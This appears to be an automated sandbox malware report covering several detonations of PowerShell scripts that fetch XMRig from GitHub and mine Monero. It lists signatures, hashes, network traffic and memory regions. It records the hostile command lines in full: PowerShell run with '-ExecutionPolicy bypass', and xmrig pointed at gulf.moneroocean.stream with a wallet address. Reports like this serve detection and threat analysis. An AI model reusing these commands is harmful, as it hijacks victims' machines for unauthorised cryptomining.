Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2440 wrote to memory of 2812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2440 wrote to memory of 2812 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/2440-0-0x00007FF8A3873000-0x00007FF8A3875000-memory.dmp
memory/2440-1-0x0000024EEC3B0000-0x0000024EEC3D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ih3wf0mu.ids.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2440-10-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp
memory/2440-11-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp
memory/2440-12-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp
memory/2440-14-0x0000024EEC720000-0x0000024EEC732000-memory.dmp
memory/2440-15-0x0000024EEC400000-0x0000024EEC40A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2812-46-0x00000277B4C70000-0x00000277B4C90000-memory.dmp
memory/2812-47-0x0000027848420000-0x0000027848440000-memory.dmp
memory/2812-48-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2440-49-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp
memory/2812-51-0x0000027848A90000-0x0000027848AB0000-memory.dmp
memory/2812-50-0x0000027848860000-0x0000027848880000-memory.dmp
memory/2812-52-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2440-53-0x00007FF8A3873000-0x00007FF8A3875000-memory.dmp
memory/2440-54-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp
memory/2812-55-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-57-0x0000027848860000-0x0000027848880000-memory.dmp
memory/2812-58-0x0000027848A90000-0x0000027848AB0000-memory.dmp
memory/2812-56-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-59-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-60-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-61-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-62-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-63-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-64-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-65-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-66-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-67-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-68-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-69-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-70-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-71-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-72-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-73-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-74-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-75-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-76-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-77-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-78-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-79-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-80-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-81-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-82-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-83-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-84-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-85-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-86-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-87-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-88-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-89-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-90-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-91-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-92-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-93-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-94-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-95-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-96-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-97-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-98-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-99-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-100-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-101-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-102-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-103-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-104-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-105-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-106-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-107-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-108-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-109-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-110-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-111-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-112-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-113-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-114-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-115-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-116-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
memory/2812-117-0x00007FF7F44A0000-0x00007FF7F50D3000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:21
Platform
win7-20240221-en
Max time kernel
1563s
Max time network
1563s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
Network
Files
memory/1040-4-0x000007FEF5D1E000-0x000007FEF5D1F000-memory.dmp
memory/1040-5-0x000000001B7C0000-0x000000001BAA2000-memory.dmp
memory/1040-6-0x0000000001ED0000-0x0000000001ED8000-memory.dmp
memory/1040-8-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp
memory/1040-9-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp
memory/1040-7-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp
memory/1040-10-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp
memory/1040-11-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp
memory/1040-12-0x000007FEF5A60000-0x000007FEF63FD000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:35
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1780s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2540 wrote to memory of 1908 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2540 wrote to memory of 1908 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
Files
memory/2540-0-0x00007FFE97363000-0x00007FFE97365000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pch1fkdj.mxz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2540-10-0x0000022636160000-0x0000022636182000-memory.dmp
memory/2540-11-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp
memory/2540-12-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp
memory/2540-14-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp
memory/2540-16-0x00000226361A0000-0x00000226361AA000-memory.dmp
memory/2540-15-0x0000022636BB0000-0x0000022636BC2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1908-47-0x00000215CD8B0000-0x00000215CD8D0000-memory.dmp
memory/1908-48-0x0000021661300000-0x0000021661320000-memory.dmp
memory/1908-49-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/2540-51-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp
memory/1908-50-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-54-0x0000021661970000-0x0000021661990000-memory.dmp
memory/1908-53-0x0000021661740000-0x0000021661760000-memory.dmp
memory/2540-52-0x00007FFE97363000-0x00007FFE97365000-memory.dmp
memory/2540-55-0x00007FFE97360000-0x00007FFE97E21000-memory.dmp
memory/1908-56-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-57-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-58-0x0000021661740000-0x0000021661760000-memory.dmp
memory/1908-59-0x0000021661970000-0x0000021661990000-memory.dmp
memory/1908-60-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-61-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-62-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-63-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-64-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-65-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-66-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-67-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-68-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-69-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-70-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-71-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-72-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-73-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-74-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-75-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-76-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-77-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-78-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-79-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-80-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-81-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-82-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-83-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-84-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-85-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-86-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-87-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-88-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-89-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-90-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-91-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-92-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-93-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-94-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-95-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-96-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-97-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-98-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-99-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-100-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-101-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-102-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-103-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-104-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-105-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-106-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-107-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-108-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-109-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-110-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-111-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-112-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-113-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-114-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-115-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-116-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-117-0x00007FF797D30000-0x00007FF798963000-memory.dmp
memory/1908-118-0x00007FF797D30000-0x00007FF798963000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:35
Platform
win11-20240508-en
Max time kernel
1791s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3884 wrote to memory of 1952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3884 wrote to memory of 1952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 52.111.227.14:443 | | tcp |
Files
memory/3884-0-0x00007FFE0ABB3000-0x00007FFE0ABB5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fp0ewzqu.31j.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3884-9-0x000002007E5B0000-0x000002007E5D2000-memory.dmp
memory/3884-10-0x00007FFE0ABB0000-0x00007FFE0B672000-memory.dmp
memory/3884-11-0x00007FFE0ABB0000-0x00007FFE0B672000-memory.dmp
memory/3884-12-0x00007FFE0ABB0000-0x00007FFE0B672000-memory.dmp
memory/3884-14-0x000002007EA90000-0x000002007EAA2000-memory.dmp
memory/3884-15-0x000002007E980000-0x000002007E98A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1952-46-0x00000206943C0000-0x00000206943E0000-memory.dmp
memory/1952-47-0x0000020694410000-0x0000020694430000-memory.dmp
memory/1952-48-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/3884-49-0x00007FFE0ABB0000-0x00007FFE0B672000-memory.dmp
memory/3884-51-0x00007FFE0ABB3000-0x00007FFE0ABB5000-memory.dmp
memory/1952-50-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-52-0x0000020694430000-0x0000020694450000-memory.dmp
memory/1952-53-0x0000020694450000-0x0000020694470000-memory.dmp
memory/1952-54-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
memory/1952-55-0x00007FF7BB2D0000-0x00007FF7BBF03000-memory.dmp
